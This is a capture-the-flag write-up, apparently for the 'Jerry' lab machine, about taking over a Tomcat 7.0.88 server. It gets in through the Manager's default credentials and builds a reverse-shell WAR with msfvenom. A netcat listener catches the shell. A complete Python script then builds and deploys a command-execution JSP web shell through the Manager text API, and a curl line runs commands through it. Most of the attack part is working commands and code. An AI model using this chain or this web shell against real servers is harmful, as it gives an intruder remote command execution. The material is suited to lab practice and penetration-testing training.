
Jerry

Easy | External | Tomcat | Java | Penetration Tester Level 1 | Remote Code Execution | A05:2021-Security Misconfiguration | Default Credentials | Malicious WAR File Upload


Looking Deeper

$ nmap -sV -sC -Pn --min-rate 5000 10.129.136.9
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 19:41 EDT
Nmap scan report for 10.129.136.9
Host is up (0.17s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds

Only one port is exposed, and it is a Tomcat 7.0.88 instance. Browse to http://10.129.136.9:8080/manager/html: the Manager application prompts for HTTP Basic authentication, but this host still accepts Tomcat's default credentials. If you are stuck, Tomcat's own 401 error page for the Manager shows the sample tomcat-users.xml entry from the documentation, which is the first pair to try.

Once authenticated, scroll down to the "WAR file to deploy" form. It accepts a .war upload and deploys it as a new web application, which is the upload primitive we will abuse: anything inside the WAR runs with the privileges of the Tomcat service.

Getting Some Information

$ searchsploit tomcat
...
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)                         | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)                         | jsp/webapps/42966.py
...

Do not be misled by those two entries. They are CVE-2017-12617, an unauthenticated JSP upload through HTTP PUT that only works when the default servlet has readonly=false, and on the 7.0.x branch it was fixed in 7.0.82, so 7.0.88 is not affected. It is also irrelevant here: we already have authenticated access to the Manager, which deploys arbitrary WARs by design. What we need is simply a WAR carrying a JSP reverse shell. Metasploit's module for that CVE is still a convenient way to list the JSP payloads that can be packaged as a .war:

$ msfconsole
...
msf> search tomcat
...
msf> use exploit/multi/http/tomcat_jsp_upload_bypass
msf exploit(multi/http/tomcat_jsp_upload_bypass) > show payloads

Compatible Payloads
===================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  payload/generic/custom                               normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                       normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                    normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/generic/ssh/interact                         normal  No     Interact with Established SSH Connection
   4  payload/java/jsp_shell_bind_tcp                      normal  No     Java JSP Command Shell, Bind TCP Inline
   5  payload/java/jsp_shell_reverse_tcp                   normal  No     Java JSP Command Shell, Reverse TCP Inline

java/jsp_shell_reverse_tcp is the one we want: a JSP that connects back to us and hands us a command shell.

Generate the WAR with msfvenom (LHOST is the attacker's VPN address, LPORT the port the listener will use):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f war > file_reverse.war

Upload file_reverse.war through "WAR file to deploy" and press Deploy. The archive is expanded under the context path /file_reverse (the file name without its extension) and shows up in the Manager's application list as running.

Start the listener before triggering the JSP; otherwise the connection back has nowhere to go:

nc -nlvp 1234

Now browse to http://10.129.136.9:8080/file_reverse/ (or click the application in the Manager's list) and check the listener: the shell arrives as the account the Tomcat service runs under.
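The same deploy step can be scripted without msfvenom or the GUI, which also makes clear what a "malicious WAR" actually is: a ZIP with a WEB-INF/web.xml that routes every URL under the context to a JSP. The example below is added to this write-up and is not code from the original page or from Metasploit. It assumes (not stated on the page) that the Manager account also holds the manager-script role, which the /manager/text/* commands require (if it only has manager-gui, use the HTML form exactly as above), and that CREDS is replaced with the working pair. The JSP and the sample /manager/text/list output are constructed for the example.

```python
"""Build a WAR with a command-execution JSP, deploy it through the Tomcat
Manager text interface, and confirm it is running. Example code added to
this write-up, not from the original page or from Metasploit. Assumptions:
the account has the manager-script role, and CREDS holds the real pair."""
import base64
import io
import urllib.request
import zipfile

BASE = "http://10.129.136.9:8080"
CREDS = "user:password"  # assumption: replace with the Manager credentials

# Minimal JSP that runs ?cmd=... and returns stdout. Constructed here as a
# stand-in for the java/jsp_shell_reverse_tcp payload used in the write-up.
CMD_JSP = r"""<%@ page import="java.io.*" %><%
String c = request.getParameter("cmd");
if (c != null) {
    Process p = Runtime.getRuntime().exec(c);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String l;
    while ((l = r.readLine()) != null) out.println(l);
}
%>"""

# Servlet 3.0 descriptor (what Tomcat 7 speaks): the catch-all /* mapping
# means requesting the context root is enough to run the JSP.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>{name}</servlet-name>
    <jsp-file>/{name}.jsp</jsp-file>
  </servlet>
  <servlet-mapping>
    <servlet-name>{name}</servlet-name>
    <url-pattern>/*</url-pattern>
  </servlet-mapping>
</web-app>
"""


def build_war(name, jsp_source=CMD_JSP):
    """A WAR is just a ZIP with WEB-INF/web.xml; return one as bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        z.writestr("WEB-INF/web.xml", WEB_XML.format(name=name))
        z.writestr(f"{name}.jsp", jsp_source)
    return buf.getvalue()


def inspect_war(war):
    """Pre-upload check: the descriptor must point at a JSP that is really in
    the archive and must use the catch-all mapping."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        entries = set(z.namelist())
        web_xml = z.read("WEB-INF/web.xml").decode()
    jsp_file = web_xml.split("<jsp-file>")[1].split("</jsp-file>")[0]
    return {
        "entries": entries,
        "jsp_file": jsp_file,
        "jsp_present": jsp_file.lstrip("/") in entries,
        "catch_all": "<url-pattern>/*</url-pattern>" in web_xml,
    }


def manager_text(path, body=None):
    """Call /manager/text/<command> with HTTP Basic auth; PUT when a body is given."""
    req = urllib.request.Request(BASE + "/manager/text" + path, data=body,
                                 method="PUT" if body else "GET")
    token = base64.b64encode(CREDS.encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode(errors="replace")


def parse_manager_list(text):
    """/manager/text/list -> {context_path: state}. Line 1 is the status
    ('OK - ...' or 'FAIL - ...'); the rest are path:state:sessions:docbase."""
    lines = text.strip().splitlines()
    if not lines or not lines[0].startswith("OK"):
        raise RuntimeError("manager refused: " + (lines[0] if lines else "<empty>"))
    apps = {}
    for line in lines[1:]:
        path, state, _sessions, _docbase = line.split(":", 3)
        apps[path] = state
    return apps


# Constructed sample of the list output after a successful deploy.
SAMPLE_LIST = """OK - Listed applications for virtual host localhost
/:running:0:ROOT
/manager:running:0:manager
/file_reverse:running:0:file_reverse
"""

if __name__ == "__main__":
    war = build_war("file_reverse")
    print(inspect_war(war))
    # Equivalent of the "WAR file to deploy" form: PUT the archive to /deploy.
    print(manager_text("/deploy?path=/file_reverse&update=true", body=war))
    print("state:", parse_manager_list(manager_text("/list")).get("/file_reverse"))
    # then: curl 'http://10.129.136.9:8080/file_reverse/?cmd=whoami'
```

The text interface is also the quickest way to clean up afterwards (`/manager/text/undeploy?path=/file_reverse`), and the inspect step catches the usual self-inflicted failure, a descriptor whose jsp-file does not match the entry name, before Tomcat rejects the archive with a 404 on the context.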